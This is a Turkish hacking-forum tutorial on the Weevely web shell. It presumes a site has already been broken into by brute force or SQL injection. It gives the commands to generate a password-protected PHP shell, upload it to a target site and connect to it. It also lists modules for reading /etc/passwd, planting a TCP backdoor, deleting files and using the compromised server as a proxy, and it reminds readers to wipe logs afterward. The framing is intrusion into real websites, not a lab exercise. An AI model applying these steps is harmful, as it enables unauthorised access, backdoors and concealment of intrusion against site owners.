Merhaba . Bugün Başlıkta yazan anlatımı yapacağım.Kaliteli konu olduğu için paylaşmak istedim.Başlayalım.
Ya brute forceden bir site düşürdünüz ya sql injection dan admin panele daldınız ya da bypass açığıyla içeri daldınız hiç farketmez.Buraya kadar gelip shell atabiliyor durumda olmanız yeterli.
Normal bir shell atmaktan farkı yok.Ama kullanımında büyük kolaylıklar var .
Weeveley aracının çok kullanışlı fonksiyonları sayesinde neler neler yapabiliriz.Ben birkaç tanesine değineceğim.O halde başlayalım.
1.ADIM :
Kali Linux ta bir terminal açalım.Weevely aracıyla shell oluşturup bir şifre belirmelek için
Kod:
weevely generate şifre /dosyayolu/
2.ADIM :
Shell dosyamızı hedef web sitesi üzerinden upload edilir.
NOT: Benim şuan gerçek web serveri üzerinde anlatım yapma imkanım yok o yüzden localhost üzerinden yaptım.Bende localhost yazan yerde sizde bir web sitesi yer alacak.
3.ADIM :
Upload ettiğiniz shell dosyasının linkini kopyalayın.Ve terminale gelip
Kod:
weevely http://hedefsite.net/shellyolu.php weevely_şifresi
4.ADIM :
Bu adımda weevely fonksiyonlarını kullanabilirsiniz.Fonksiyonlar listesini help yazarak görüntüleyebilirsiniz.
Birkaç Tane Fonksiyon İnceleyelim:
:system_info : Sistem bilgisini görüntüler
:file_upload : Dosya upload eder
:file_rm : Belirtilen dosyayı siler
:audit_etwpasswd : linuxda /etc/passwd dosyasını görüntüler
:backdoor_tcp : arka kapı(backdoor) yerleştirir
:net_proxy : web serverini proxy olarak kullan(MEALİ : web serveri kölen yapmak )
Web Serverini Http Proxy Olarak Kullanma(WEB SERVERİNİ KÖLEMİZ YAPMAK) :16::24:
İşlemi başlatmak için
İşlemi başlatttıktan sonra tarayıcınızın proxy ayarlarına gidin ve proxy olarak size verilen adresi yapın.
Sonra ip adresinizi gösteren siteleri gidin ve sonucu görün.Eğer weevelyi kapatırsanız proxy duracaktır.İşleminiz bittiğinde logları silmeyi unutmayın.Bu anlattıklarmla sınırlı kalmayın çok değişik combolar yapılabilir.
Türkçe kaynak yoktu.Yabancı kaynaklarda bulunan ve uzun uğraş sonucu bulduğum bir bilgidir. #Emeğe saygı . Başka anlatımlarda görüşmek üzere .
Son düzenleme: